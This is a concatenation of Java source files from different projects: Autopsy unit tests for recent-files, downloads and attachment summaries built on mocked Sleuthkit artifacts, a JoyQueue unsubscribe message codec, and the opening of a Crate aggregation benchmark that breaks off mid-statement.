    public void getRecentAttachments_testNoDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
        // NOTE(review): the method name says "NoDataSource" but the body exercises
        // the no-returned-results path. The name looks like a copy-paste slip;
        // confirm and rename in a follow-up (renaming changes the public test id).
        testNoReturnedResults_ReturnsEmptyList(RECENT_ATTACHMENT_FUNCT, "getRecentAttachments");
    }
    /** Number of seconds in a day. */
    private static final long DAY_SECONDS = 24 * 60 * 60;

    /**
     * A means of creating a number representing seconds from epoch where the
     * lower the idx, the more recent the time.
     */
    private static final Function<Integer, Long> dateTimeRetriever = (idx) -> (365 - idx) * DAY_SECONDS + 1;
/**
* Gets a mock BlackboardArtifact.
*
* @param ds The data source to which the artifact belongs.
* @param artifactId The artifact id.
* @param artType The artifact type.
* @param attributeArgs The mapping of attribute type to value for each
* attribute in the artifact.
*
* @return The mock artifact.
*/
private BlackboardArtifact getArtifact(DataSource ds, long artifactId, ARTIFACT_TYPE artType, List<Pair<ATTRIBUTE_TYPE, Object>> attributeArgs) {
try {
List<BlackboardAttribute> attributes = attributeArgs.stream()
.filter((arg) -> arg != null && arg.getLeft() != null && arg.getRight() != null)
.map((arg) -> {
return TskMockUtils.getAttribute(arg.getLeft(), arg.getRight());
})
.collect(Collectors.toList());
return TskMockUtils.getArtifact(new BlackboardArtifact.Type(artType), artifactId, ds, attributes);
} catch (TskCoreException ex) {
fail("There was an error mocking an artifact.");
return null;
}
}
    /**
     * Returns a mock artifact for getRecentlyOpenedDocuments.
     *
     * @param ds The datasource for the artifact.
     * @param artifactId The artifact id.
     * @param dateTime The time in seconds from epoch, or null to omit the attribute.
     * @param path The path for the document, or null to omit the attribute.
     *
     * @return The mock artifact with pertinent attributes.
     */
    private BlackboardArtifact getRecentDocumentArtifact(DataSource ds, long artifactId, Long dateTime, String path) {
        return getArtifact(ds, artifactId, ARTIFACT_TYPE.TSK_RECENT_OBJECT, Arrays.asList(
                Pair.of(ATTRIBUTE_TYPE.TSK_DATETIME_ACCESSED, dateTime),
                Pair.of(ATTRIBUTE_TYPE.TSK_PATH, path)
        ));
    }
    @Test
    public void getRecentlyOpenedDocuments_sortedByDateTimeAndLimited() throws SleuthkitCaseProviderException, TskCoreException {
        Function<Integer, String> pathRetriever = (idx) -> "/path/to/downloads/" + idx;
        DataSource dataSource = TskMockUtils.getDataSource(1);
        int countRequest = 10;
        // Exercise result counts below, at, and above the requested limit.
        for (int countToGenerate : new int[]{1, 9, 10, 11}) {
            // generate artifacts for each artifact
            List<BlackboardArtifact> artifacts = new ArrayList<>();
            for (int idx = 0; idx < countToGenerate; idx++) {
                BlackboardArtifact artifact = getRecentDocumentArtifact(dataSource,
                        1000 + idx, dateTimeRetriever.apply(idx), pathRetriever.apply(idx));
                artifacts.add(artifact);
            }

            // run through method; the input order is shuffled so ordering must
            // come from the implementation, not the fixture
            Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
            RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
            List<RecentFileDetails> results = summary.getRecentlyOpenedDocuments(dataSource, countRequest);

            // verify results are most-recent-first and capped at countRequest
            int expectedCount = Math.min(countRequest, countToGenerate);
            Assert.assertNotNull(results);
            Assert.assertEquals(expectedCount, results.size());

            for (int i = 0; i < expectedCount; i++) {
                Assert.assertEquals(dateTimeRetriever.apply(i), results.get(i).getDateAsLong());
                Assert.assertEquals(pathRetriever.apply(i), results.get(i).getPath());
            }
        }
    }
    @Test
    public void getRecentlyOpenedDocuments_uniquePaths() throws SleuthkitCaseProviderException, TskCoreException {
        DataSource dataSource = TskMockUtils.getDataSource(1);
        // Three artifacts share one path; only the most recent should be returned.
        BlackboardArtifact item1 = getRecentDocumentArtifact(dataSource, 1001, DAY_SECONDS, "/a/path");
        BlackboardArtifact item2 = getRecentDocumentArtifact(dataSource, 1002, DAY_SECONDS + 1, "/a/path");
        BlackboardArtifact item3 = getRecentDocumentArtifact(dataSource, 1003, DAY_SECONDS + 2, "/a/path");

        List<BlackboardArtifact> artifacts = Arrays.asList(item2, item3, item1);

        Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
        List<RecentFileDetails> results = summary.getRecentlyOpenedDocuments(dataSource, 10);

        // verify results (only the newest entry for the path)
        Assert.assertNotNull(results);
        Assert.assertEquals(1, results.size());
        Assert.assertEquals((Long) (DAY_SECONDS + 2), results.get(0).getDateAsLong());
        Assert.assertTrue("/a/path".equalsIgnoreCase(results.get(0).getPath()));
    }
    @Test
    public void getRecentlyOpenedDocuments_filtersMissingData() throws SleuthkitCaseProviderException, TskCoreException {
        DataSource dataSource = TskMockUtils.getDataSource(1);
        // Artifacts with a null or zero access time must be filtered out.
        BlackboardArtifact successItem = getRecentDocumentArtifact(dataSource, 1001, DAY_SECONDS, "/a/path");
        BlackboardArtifact nullTime = getRecentDocumentArtifact(dataSource, 1002, null, "/a/path2");
        BlackboardArtifact zeroTime = getRecentDocumentArtifact(dataSource, 10021, 0L, "/a/path2a");

        List<BlackboardArtifact> artifacts = Arrays.asList(nullTime, zeroTime, successItem);

        Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
        List<RecentFileDetails> results = summary.getRecentlyOpenedDocuments(dataSource, 10);

        // verify results (only successItem)
        Assert.assertNotNull(results);
        Assert.assertEquals(1, results.size());
        Assert.assertEquals((Long) DAY_SECONDS, results.get(0).getDateAsLong());
        Assert.assertTrue("/a/path".equalsIgnoreCase(results.get(0).getPath()));
    }
    /**
     * Creates a mock blackboard artifact for getRecentDownloads.
     *
     * @param ds The datasource.
     * @param artifactId The artifact id.
     * @param dateTime The time in seconds from epoch, or null to omit the attribute.
     * @param domain The domain, or null to omit the attribute.
     * @param path The path for the download, or null to omit the attribute.
     *
     * @return The mock artifact.
     */
    private BlackboardArtifact getRecentDownloadArtifact(DataSource ds, long artifactId, Long dateTime, String domain, String path) {
        return getArtifact(ds, artifactId, ARTIFACT_TYPE.TSK_WEB_DOWNLOAD, Arrays.asList(
                Pair.of(ATTRIBUTE_TYPE.TSK_DATETIME_ACCESSED, dateTime),
                Pair.of(ATTRIBUTE_TYPE.TSK_DOMAIN, domain),
                Pair.of(ATTRIBUTE_TYPE.TSK_PATH, path)
        ));
    }
    @Test
    public void getRecentDownloads_sortedByDateTimeAndLimited() throws SleuthkitCaseProviderException, TskCoreException {
        Function<Integer, String> domainRetriever = (idx) -> String.format("www.domain%d.com", idx);
        Function<Integer, String> pathRetriever = (idx) -> "/path/to/downloads/doc" + idx + ".pdf";

        // run through method
        DataSource dataSource = TskMockUtils.getDataSource(1);
        int countRequest = 10;
        // Exercise result counts below, at, and above the requested limit.
        for (int countToGenerate : new int[]{1, 9, 10, 11}) {
            // generate artifacts for each artifact
            List<BlackboardArtifact> artifacts = new ArrayList<>();
            for (int idx = 0; idx < countToGenerate; idx++) {
                BlackboardArtifact artifact = getRecentDownloadArtifact(dataSource,
                        1000 + idx, dateTimeRetriever.apply(idx), domainRetriever.apply(idx),
                        pathRetriever.apply(idx));
                artifacts.add(artifact);
            }

            // call method with shuffled input so ordering must come from the implementation
            Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
            RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
            List<RecentDownloadDetails> results = summary.getRecentDownloads(dataSource, countRequest);

            // verify results are most-recent-first and capped at countRequest
            int expectedCount = Math.min(countRequest, countToGenerate);
            Assert.assertNotNull(results);
            Assert.assertEquals(expectedCount, results.size());

            for (int i = 0; i < expectedCount; i++) {
                Assert.assertEquals(dateTimeRetriever.apply(i), results.get(i).getDateAsLong());
                Assert.assertEquals(pathRetriever.apply(i), results.get(i).getPath());
                Assert.assertEquals(domainRetriever.apply(i), results.get(i).getWebDomain());
            }
        }
    }
@Test
public void getRecentDownloads_uniquePaths() throws SleuthkitCaseProviderException, TskCoreException {
DataSource dataSource = TskMockUtils.getDataSource(1);
BlackboardArtifact item1 = getRecentDownloadArtifact(dataSource, 1001, DAY_SECONDS, "domain1.com", "/a/path1");
BlackboardArtifact item1a = getRecentDownloadArtifact(dataSource, 10011, DAY_SECONDS + 1, "domain1.com", "/a/path1");
BlackboardArtifact item2 = getRecentDownloadArtifact(dataSource, 1002, DAY_SECONDS + 2, "domain2.com", "/a/path1");
BlackboardArtifact item3 = getRecentDownloadArtifact(dataSource, 1003, DAY_SECONDS + 3, "domain2a.com", "/a/path1");
List<BlackboardArtifact> artifacts = Arrays.asList(item2, item3, item1);
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
// call method
List<RecentDownloadDetails> results = summary.getRecentDownloads(dataSource, 10);
// verify results
Assert.assertNotNull(results);
Assert.assertEquals(1, results.size());
Assert.assertEquals((Long) (DAY_SECONDS + 3), results.get(0).getDateAsLong());
Assert.assertTrue("/a/path1".equalsIgnoreCase(results.get(0).getPath()));
Assert.assertTrue("domain2a.com".equalsIgnoreCase(results.get(0).getWebDomain()));
}
    @Test
    public void getRecentDownloads_filtersMissingData() throws SleuthkitCaseProviderException, TskCoreException {
        DataSource dataSource = TskMockUtils.getDataSource(1);
        // Artifacts with a null or zero access time must be filtered out.
        BlackboardArtifact successItem = getRecentDownloadArtifact(dataSource, 1001, DAY_SECONDS, "domain1.com", "/a/path1");
        BlackboardArtifact nullTime = getRecentDownloadArtifact(dataSource, 1002, null, "domain2.com", "/a/path2");
        BlackboardArtifact zeroTime = getRecentDownloadArtifact(dataSource, 10021, 0L, "domain2a.com", "/a/path2a");

        List<BlackboardArtifact> artifacts = Arrays.asList(nullTime, zeroTime, successItem);

        Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());

        // call method
        List<RecentDownloadDetails> results = summary.getRecentDownloads(dataSource, 10);

        // verify results (only successItem)
        Assert.assertNotNull(results);
        Assert.assertEquals(1, results.size());
        Assert.assertEquals((Long) DAY_SECONDS, results.get(0).getDateAsLong());
        Assert.assertTrue("/a/path1".equalsIgnoreCase(results.get(0).getPath()));
    }
/**
* getRecentAttachments method has special setup conditions. This class
* encapsulates all the SleuthkitCase/BlackboardArtifact setup for on
* possible return item.
*/
private class AttachmentArtifactItem {
        /** Artifact type id for the message artifact, or null to create no message artifact. */
        private final Integer messageArtifactTypeId;
        /** When false, the TSK_ASSOCIATED_OBJECT artifact is built without its (required) attribute. */
        private final boolean associatedAttrFormed;
        /** Sender of the message, or null to omit the attribute. */
        private final String emailFrom;
        /** Message time in seconds from epoch, or null to omit the attribute. */
        private final Long messageTime;
        /** Whether the artifact has a parent AbstractFile. */
        private final boolean isParent;
        /** The parent AbstractFile's path value. */
        private final String fileParentPath;
        /** The parent AbstractFile's filename value. */
        private final String fileName;
/**
* Constructor with all parameters.
*
* @param messageArtifactTypeId The type id for the artifact or null if
* no message artifact to be created.
* @param emailFrom Who the message is from or null not to include
* attribute.
* @param messageTime Time in seconds from epoch or null not to include
* attribute.
* @param fileParentPath The parent AbstractFile's path value.
* @param fileName The parent AbstractFile's filename value.
* @param associatedAttrFormed If false, the TSK_ASSOCIATED_OBJECT
* artifact has no attribute (even though it is required).
* @param hasParent Whether or not the artifact has a parent
* AbstractFile.
*/
AttachmentArtifactItem(Integer messageArtifactTypeId, String emailFrom, Long messageTime,
String fileParentPath, String fileName,
boolean associatedAttrFormed, boolean hasParent) {
this.messageArtifactTypeId = messageArtifactTypeId;
this.associatedAttrFormed = associatedAttrFormed;
this.emailFrom = emailFrom;
this.messageTime = messageTime;
this.isParent = hasParent;
this.fileParentPath = fileParentPath;
this.fileName = fileName;
}
/**
* Convenience constructor where defaults of required attributes and
* SleuthkitCase assumed.
*
* @param messageArtifactTypeId The type id for the artifact or null if
* no message artifact to be created.
* @param emailFrom Who the message is from or null not to include
* attribute.
* @param messageTime Time in seconds from epoch or null not to include
* attribute.
* @param fileParentPath The parent AbstractFile's path value.
* @param fileName The parent AbstractFile's filename value.
*/
AttachmentArtifactItem(Integer messageArtifactTypeId, String emailFrom, Long messageTime, String fileParentPath, String fileName) {
this(messageArtifactTypeId, emailFrom, messageTime, fileParentPath, fileName, true, true);
}
boolean isAssociatedAttrFormed() {
return associatedAttrFormed;
}
String getEmailFrom() {
return emailFrom;
}
Long getMessageTime() {
return messageTime;
}
boolean hasParent() {
return isParent;
}
String getFileParentPath() {
return fileParentPath;
}
String getFileName() {
return fileName;
}
Integer getMessageArtifactTypeId() {
return messageArtifactTypeId;
}
}
/**
* Sets up the associated artifact message for the TSK_ASSOCIATED_OBJECT.
*
* @param artifacts The mapping of artifact id to artifact.
* @param item The record to setup.
* @param dataSource The datasource.
* @param associatedId The associated attribute id.
* @param artifactId The artifact id.
*
* @return The associated Artifact blackboard attribute.
*
* @throws TskCoreException
*/
private BlackboardAttribute setupAssociatedMessage(Map<Long, BlackboardArtifact> artifacts, AttachmentArtifactItem item,
        DataSource dataSource, Long associatedId, Long artifactId) throws TskCoreException {

    BlackboardAttribute associatedAttr = TskMockUtils.getAttribute(ATTRIBUTE_TYPE.TSK_ASSOCIATED_ARTIFACT, associatedId);

    // no message artifact requested; return the bare attribute
    if (item.getMessageArtifactTypeId() == null) {
        return associatedAttr;
    }

    // resolve the ARTIFACT_TYPE whose id matches (null when no match exists)
    ARTIFACT_TYPE messageType = null;
    for (ARTIFACT_TYPE candidate : ARTIFACT_TYPE.values()) {
        if (candidate.getTypeID() == item.getMessageArtifactTypeId()) {
            messageType = candidate;
            break;
        }
    }

    if (messageType == null) {
        return associatedAttr;
    }

    // build the message artifact with whichever attributes the item specifies
    List<BlackboardAttribute> attributes = new ArrayList<>();
    if (item.getEmailFrom() != null) {
        attributes.add(TskMockUtils.getAttribute(ATTRIBUTE_TYPE.TSK_EMAIL_FROM, item.getEmailFrom()));
    }
    if (item.getMessageTime() != null) {
        attributes.add(TskMockUtils.getAttribute(ATTRIBUTE_TYPE.TSK_DATETIME_SENT, item.getMessageTime()));
    }
    artifacts.put(associatedId, TskMockUtils.getArtifact(
            new BlackboardArtifact.Type(messageType), artifactId, dataSource, attributes));

    return associatedAttr;
}
/**
* Since getRecentAttachments does not simply query one type of artifact and
* return results, this method sets up a mock SleuthkitCase and Blackboard
* to return pertinent data.
*
* @param items Each attachment item where each item could represent a
* return result if fully formed.
*
* @return The mock SleuthkitCase and Blackboard.
*/
private Pair<SleuthkitCase, Blackboard> getRecentAttachmentArtifactCase(List<AttachmentArtifactItem> items) {

    SleuthkitCase skCase = mock(SleuthkitCase.class);
    Blackboard blackboard = mock(Blackboard.class);
    when(skCase.getBlackboard()).thenReturn(blackboard);

    DataSource dataSource = TskMockUtils.getDataSource(1);

    // monotonically increasing object id; every artifact/attribute/file gets a fresh id
    long objIdCounter = 100;
    // artifact id -> artifact, shared with the mocked blackboard lookups below
    Map<Long, BlackboardArtifact> artifacts = new HashMap<>();
    try {
        for (AttachmentArtifactItem item : items) {
            BlackboardAttribute associatedAttr = null;
            // if the associated attribute is fully formed,
            // create the associated attribute and related artifact
            if (item.isAssociatedAttrFormed()) {
                // NOTE: Java evaluates arguments left-to-right, so the attribute id
                // is allocated before the artifact id — do not reorder.
                associatedAttr = setupAssociatedMessage(artifacts, item, dataSource, ++objIdCounter, ++objIdCounter);
            }

            // create the content parent for the associated object if one should be present
            Content parent = (item.hasParent())
                    ? TskMockUtils.getAbstractFile(++objIdCounter, item.getFileParentPath(), item.getFileName())
                    : null;

            Long associatedId = ++objIdCounter;
            artifacts.put(associatedId, TskMockUtils.getArtifact(
                    new BlackboardArtifact.Type(ARTIFACT_TYPE.TSK_ASSOCIATED_OBJECT),
                    parent, associatedId, dataSource, associatedAttr));
        }

        // set up the blackboard to return artifacts that match the type id.
        when(blackboard.getArtifacts(anyInt(), anyLong())).thenAnswer((inv) -> {
            Object[] args = inv.getArguments();
            int artifactType = (Integer) args[0];
            return artifacts.values().stream()
                    .filter(art -> art.getArtifactTypeID() == artifactType)
                    .collect(Collectors.toList());
        });

        // also set up the sleuthkitcase to return the artifact with the matching id or null.
        when(skCase.getBlackboardArtifact(anyLong())).thenAnswer((inv2) -> {
            Object[] args2 = inv2.getArguments();
            long id = (Long) args2[0];
            return artifacts.get(id);
        });

        return Pair.of(skCase, blackboard);
    } catch (TskCoreException ex) {
        // mock construction itself should never throw; fail the test if it does
        fail("There was an error while creating SleuthkitCase for getRecentAttachments");
        return null;
    }
}
@Test
public void getRecentAttachments_sortedByDateTimeAndLimited() throws SleuthkitCaseProviderException, TskCoreException {
    DataSource dataSource = TskMockUtils.getDataSource(1);

    // a deterministic means of transforming an index into a particular attribute type so that they can be created
    // and compared on return
    // NOTE(review): the email format string looks anonymized — String.format ignores
    // the extra idx argument, so every sender is identical; confirm intended.
    Function<Integer, String> emailFromRetriever = (idx) -> String.format("<EMAIL>", idx);
    Function<Integer, String> pathRetriever = (idx) -> "/path/to/attachment/" + idx;
    Function<Integer, String> fileNameRetriever = (idx) -> String.format("%d-filename.png", idx);

    int countRequest = 10;
    // exercise under-, exactly-at-, and over-the-limit item counts
    for (int countToGenerate : new int[]{1, 9, 10, 11}) {
        // set up the items in the sleuthkit case
        // (dateTimeRetriever is defined elsewhere in this test class)
        List<AttachmentArtifactItem> items = IntStream.range(0, countToGenerate)
                .mapToObj((idx) -> new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_MESSAGE.getTypeID(),
                        emailFromRetriever.apply(idx), dateTimeRetriever.apply(idx),
                        pathRetriever.apply(idx), fileNameRetriever.apply(idx)))
                .collect(Collectors.toList());

        // shuffle so returned ordering must come from sorting, not insertion order
        List<AttachmentArtifactItem> mixedUpItems = RandomizationUtils.getMixedUp(items);
        Pair<SleuthkitCase, Blackboard> casePair = getRecentAttachmentArtifactCase(mixedUpItems);
        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());

        // retrieve results
        List<RecentAttachmentDetails> results = summary.getRecentAttachments(dataSource, countRequest);

        // verify results: capped at countRequest and ordered so that result i
        // corresponds to generated item i
        int expectedCount = Math.min(countRequest, countToGenerate);
        Assert.assertNotNull(results);
        Assert.assertEquals(expectedCount, results.size());

        for (int i = 0; i < expectedCount; i++) {
            RecentAttachmentDetails result = results.get(i);
            Assert.assertEquals(dateTimeRetriever.apply(i), result.getDateAsLong());
            Assert.assertTrue(emailFromRetriever.apply(i).equalsIgnoreCase(result.getSender()));
            Assert.assertTrue(Paths.get(pathRetriever.apply(i), fileNameRetriever.apply(i)).toString()
                    .equalsIgnoreCase(result.getPath()));
        }
    }
}
@Test
public void getRecentAttachments_filterData() throws SleuthkitCaseProviderException, TskCoreException {
    // setup data
    DataSource dataSource = TskMockUtils.getDataSource(1);

    // two fully-formed items that should be returned
    AttachmentArtifactItem successItem = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", DAY_SECONDS, "/parent/path", "msg.pdf");
    AttachmentArtifactItem successItem2 = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_MESSAGE.getTypeID(),
            "person_on_skype", DAY_SECONDS + 1, "/parent/path/to/skype", "skype.png");
    // filtered: artifact type is not a message type
    AttachmentArtifactItem wrongArtType = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_CALLLOG.getTypeID(),
            "5555675309", DAY_SECONDS + 2, "/path/to/callog/info", "callog.dat");
    // filtered: null timestamp
    AttachmentArtifactItem missingTimeStamp = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", null, "/parent/path", "msg2.pdf");
    // filtered: zero timestamp
    AttachmentArtifactItem zeroTimeStamp = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", 0L, "/parent/path", "msg2a.png");
    // filtered: associated object has no parent AbstractFile
    AttachmentArtifactItem noParentFile = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", DAY_SECONDS + 4, "/parent/path", "msg4.jpg", true, false);
    // filtered: TSK_ASSOCIATED_OBJECT lacks its associated-artifact attribute
    AttachmentArtifactItem noAssocAttr = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", DAY_SECONDS + 5, "/parent/path", "msg5.gif", false, true);
    // filtered: no message artifact is created at all
    AttachmentArtifactItem missingAssocArt = new AttachmentArtifactItem(null,
            "<EMAIL>", DAY_SECONDS + 6, "/parent/path", "msg6.pdf");

    List<AttachmentArtifactItem> items = Arrays.asList(successItem, successItem2,
            wrongArtType, missingTimeStamp, zeroTimeStamp,
            noParentFile, noAssocAttr, missingAssocArt);

    Pair<SleuthkitCase, Blackboard> casePair = getRecentAttachmentArtifactCase(items);
    RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());

    // get data
    List<RecentAttachmentDetails> results = summary.getRecentAttachments(dataSource, 10);

    // verify results: only the two valid items remain, most recent first
    Assert.assertNotNull(results);
    Assert.assertEquals(2, results.size());

    RecentAttachmentDetails successItem2Details = results.get(0);
    RecentAttachmentDetails successItemDetails = results.get(1);

    Assert.assertEquals(successItemDetails.getDateAsLong(), (Long) DAY_SECONDS);
    Assert.assertTrue(Paths.get(successItem.getFileParentPath(), successItem.getFileName())
            .toString().equalsIgnoreCase(successItemDetails.getPath()));
    Assert.assertTrue(successItem.getEmailFrom().equalsIgnoreCase(successItemDetails.getSender()));

    Assert.assertEquals(successItem2Details.getDateAsLong(), (Long) (DAY_SECONDS + 1));
    Assert.assertTrue(Paths.get(successItem2.getFileParentPath(), successItem2.getFileName())
            .toString().equalsIgnoreCase(successItem2Details.getPath()));
    Assert.assertTrue(successItem2.getEmailFrom().equalsIgnoreCase(successItem2Details.getSender()));
}
@Test
public void getRecentAttachments_uniquePath() throws SleuthkitCaseProviderException, TskCoreException {
    // setup: three attachments sharing the same parent path and file name,
    // differing only in timestamp — only the most recent one should be reported
    DataSource dataSource = TskMockUtils.getDataSource(1);
    AttachmentArtifactItem earliest = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", DAY_SECONDS, "/parent/path", "msg.pdf");
    AttachmentArtifactItem middle = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_MESSAGE.getTypeID(),
            "person_on_skype", DAY_SECONDS + 1, "/parent/path", "msg.pdf");
    AttachmentArtifactItem latest = new AttachmentArtifactItem(ARTIFACT_TYPE.TSK_EMAIL_MSG.getTypeID(),
            "<EMAIL>", DAY_SECONDS + 2, "/parent/path", "msg.pdf");

    Pair<SleuthkitCase, Blackboard> casePair =
            getRecentAttachmentArtifactCase(Arrays.asList(earliest, middle, latest));
    RecentFilesSummary summary = new RecentFilesSummary(casePair::getLeft);

    // get data
    List<RecentAttachmentDetails> results = summary.getRecentAttachments(dataSource, 10);

    // verify: duplicates collapsed to the single newest entry
    Assert.assertNotNull(results);
    Assert.assertEquals(1, results.size());
    RecentAttachmentDetails newest = results.get(0);
    Assert.assertEquals((Long) (DAY_SECONDS + 2), newest.getDateAsLong());
    Assert.assertTrue(Paths.get(latest.getFileParentPath(), latest.getFileName())
            .toString().equalsIgnoreCase(newest.getPath()));
    Assert.assertTrue(newest.getSender().equalsIgnoreCase(latest.getEmailFrom()));
}
}
| 14,255 |
311 | /**
* Copyright 2019 The JoyQueue Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.joyqueue.network.codec;
import org.joyqueue.domain.Subscription;
import org.joyqueue.domain.TopicName;
import org.joyqueue.network.command.CommandType;
import org.joyqueue.network.command.UnSubscribe;
import org.joyqueue.network.serializer.Serializer;
import org.joyqueue.network.transport.codec.PayloadCodec;
import org.joyqueue.network.transport.command.Header;
import org.joyqueue.network.transport.command.Type;
import io.netty.buffer.ByteBuf;
import java.util.ArrayList;
import java.util.List;
/**
* @author wylixiaobin
* Date: 2018/10/16
*/
public class UnSubscribeCodec implements PayloadCodec<Header, UnSubscribe>, Type {

    /**
     * Decodes an UnSubscribe payload: a short entry count followed by
     * (topic full name, app, type byte) triples.
     *
     * @param header command header (unused here)
     * @param buffer wire buffer positioned at the payload
     * @return the decoded {@link UnSubscribe} command
     * @throws Exception on malformed input
     */
    @Override
    public Object decode(Header header, ByteBuf buffer) throws Exception {
        // primitive short avoids the previous Short boxing/unboxing per comparison
        short subscriptionSize = buffer.readShort();
        // typed, pre-sized list (was a raw-type ArrayList)
        List<Subscription> subscriptions = new ArrayList<>(Math.max(subscriptionSize, 0));
        for (int i = 0; i < subscriptionSize; i++) {
            TopicName topic = TopicName.parse(Serializer.readString(buffer));
            String app = Serializer.readString(buffer);
            Subscription.Type type = Subscription.Type.valueOf(buffer.readByte());
            subscriptions.add(new Subscription(topic, app, type));
        }
        return new UnSubscribe().subscriptions(subscriptions);
    }

    /**
     * Encodes an UnSubscribe payload in the same layout decode expects:
     * entry count, then one (topic, app, type) triple per subscription.
     *
     * @param payload command to encode; a null subscription list encodes as count 0
     * @param buffer  destination wire buffer
     * @throws Exception on serialization failure
     */
    @Override
    public void encode(UnSubscribe payload, ByteBuf buffer) throws Exception {
        List<Subscription> subscriptions = payload.getSubscriptions();
        int subscriptionSize = subscriptions == null ? 0 : subscriptions.size();
        buffer.writeShort(subscriptionSize);
        if (subscriptionSize > 0) {
            for (Subscription subscription : subscriptions) {
                Serializer.write(subscription.getTopic().getFullName(), buffer);
                Serializer.write(subscription.getApp(), buffer);
                buffer.writeByte(subscription.getType().getValue());
            }
        }
    }

    /** @return the wire command type this codec handles */
    @Override
    public int type() {
        return CommandType.UNSUBSCRIBE;
    }
}
| 924 |
3,066 | <reponame>skofra0/crate<gh_stars>1000+
/*
* Licensed to Crate.io GmbH ("Crate") under one or more contributor
* license agreements. See the NOTICE file distributed with this work for
* additional information regarding copyright ownership. Crate licenses
* this file to you under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License. You may
* obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* However, if you have executed another commercial license agreement
* with Crate these terms will supersede the license and you may use the
* software solely pursuant to the terms of the relevant commercial agreement.
*/
package io.crate.execution.engine.aggregation;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.function.BiConsumer;
import java.util.function.Function;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import org.elasticsearch.Version;
import org.elasticsearch.common.inject.ModulesBuilder;
import org.openjdk.jmh.annotations.Benchmark;
import org.openjdk.jmh.annotations.BenchmarkMode;
import org.openjdk.jmh.annotations.Mode;
import org.openjdk.jmh.annotations.OutputTimeUnit;
import org.openjdk.jmh.annotations.Scope;
import org.openjdk.jmh.annotations.Setup;
import org.openjdk.jmh.annotations.State;
import io.crate.breaker.RamAccounting;
import io.crate.data.Input;
import io.crate.data.Row;
import io.crate.data.Row1;
import io.crate.execution.engine.aggregation.impl.AggregationImplModule;
import io.crate.execution.engine.aggregation.impl.SumAggregation;
import io.crate.execution.engine.collect.InputCollectExpression;
import io.crate.expression.symbol.AggregateMode;
import io.crate.expression.symbol.Literal;
import io.crate.memory.OnHeapMemoryManager;
import io.crate.metadata.Functions;
import io.crate.metadata.functions.Signature;
import io.crate.types.DataTypes;
@BenchmarkMode(Mode.AverageTime)
@OutputTimeUnit(TimeUnit.MICROSECONDS)
@State(Scope.Benchmark)
public class AggregateCollectorBenchmark {

    // 10k single-integer rows fed through the collector on every invocation
    private final List<Row> rows = IntStream.range(0, 10_000).mapToObj(Row1::new).collect(Collectors.toList());

    private AggregateCollector collector;

    @Setup
    public void setup() {
        InputCollectExpression inExpr0 = new InputCollectExpression(0);
        // resolve the integer->long sum aggregation from the registered implementations
        Functions functions = new ModulesBuilder()
            .add(new AggregationImplModule())
            .createInjector()
            .getInstance(Functions.class);
        // NOTE(review): last argument is the actual return type; INTEGER here vs LONG
        // in the signature — confirm against Functions.getQualified semantics.
        SumAggregation<?> sumAggregation = (SumAggregation<?>) functions.getQualified(
            Signature.aggregate(
                SumAggregation.NAME,
                DataTypes.INTEGER.getTypeSignature(),
                DataTypes.LONG.getTypeSignature()
            ),
            List.of(DataTypes.INTEGER),
            DataTypes.INTEGER
        );

        var memoryManager = new OnHeapMemoryManager(bytes -> {});
        // NOTE(review): Version.CURRENT is passed twice — presumably two distinct
        // version parameters of the ctor; verify against AggregateCollector.
        collector = new AggregateCollector(
            Collections.singletonList(inExpr0),
            RamAccounting.NO_ACCOUNTING,
            memoryManager,
            Version.CURRENT,
